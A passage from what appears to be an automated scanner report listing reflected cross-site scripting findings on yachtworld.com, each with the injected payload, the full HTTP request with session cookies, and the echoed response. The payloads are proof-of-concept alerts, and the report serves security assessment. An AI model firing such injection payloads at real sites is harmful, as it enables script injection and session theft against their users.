Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Massachusetts/1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e9e1"style%3d"x%3aexpression(alert(1))"f3d4b2f9162 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8e9e1"style="x:expression(alert(1))"f3d4b2f9162 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /boats/category/type/builder/model/United+States/Massachusetts/1?8e9e1"style%3d"x%3aexpression(alert(1))"f3d4b2f9162=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:57:58 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:12:05 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>B
...[SNIP]...
<a rel="nofollow" href="/core/listing/cache/searchResults.jsp?8e9e1"style="x:expression(alert(1))"f3d4b2f9162&ps=30&ic=true&slim=yw&seo=true&N=4635&sm=3&obp=true&cit=true" class="removalLink">
...[SNIP]...

3.305. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Michigan/1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Michigan/1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 232e0"style%3d"x%3aexpression(alert(1))"ad26b2f7bfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 232e0"style="x:expression(alert(1))"ad26b2f7bfe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /boats/category/type/builder/model/United+States/Michigan/1?232e0"style%3d"x%3aexpression(alert(1))"ad26b2f7bfe=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:57:59 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:12:05 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>B
...[SNIP]...
<a rel="nofollow" href="/core/listing/cache/searchResults.jsp?ps=30&ic=true&slim=yw&232e0"style="x:expression(alert(1))"ad26b2f7bfe&seo=true&N=4639&sm=3&obp=true&cit=true" class="removalLink">
...[SNIP]...

3.306. http://www.yachtworld.com/boats/category/type/builder/model/United+States/New+Jersey/1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/New+Jersey/1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d0fe"style%3d"x%3aexpression(alert(1))"5e97aefc973 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2d0fe"style="x:expression(alert(1))"5e97aefc973 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /boats/category/type/builder/model/United+States/New+Jersey/1?2d0fe"style%3d"x%3aexpression(alert(1))"5e97aefc973=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:57:48 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:11:55 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>B
...[SNIP]...
<a rel="nofollow" href="/core/listing/cache/searchResults.jsp?2d0fe"style="x:expression(alert(1))"5e97aefc973&ps=30&ic=true&slim=yw&seo=true&N=4657&sm=3&obp=true&cit=true" class="removalLink">
...[SNIP]...

3.307. http://www.yachtworld.com/boats/category/type/builder/model/United+States/New+York/1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/New+York/1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2769a"style%3d"x%3aexpression(alert(1))"8aa6c43e6a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2769a"style="x:expression(alert(1))"8aa6c43e6a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /boats/category/type/builder/model/United+States/New+York/1?2769a"style%3d"x%3aexpression(alert(1))"8aa6c43e6a7=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:56:44 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:10:51 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>B
...[SNIP]...
<a rel="nofollow" href="/core/listing/cache/searchResults.jsp?ps=30&ic=true&slim=yw&seo=true&N=4663&sm=3&obp=true&cit=true&2769a"style="x:expression(alert(1))"8aa6c43e6a7" class="removalLink">
...[SNIP]...

3.308. http://www.yachtworld.com/boats/category/type/builder/model/United+States/North+Carolina/1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/North+Carolina/1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55674"style%3d"x%3aexpression(alert(1))"123f0b4bcad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 55674"style="x:expression(alert(1))"123f0b4bcad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /boats/category/type/builder/model/United+States/North+Carolina/1?55674"style%3d"x%3aexpression(alert(1))"123f0b4bcad=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6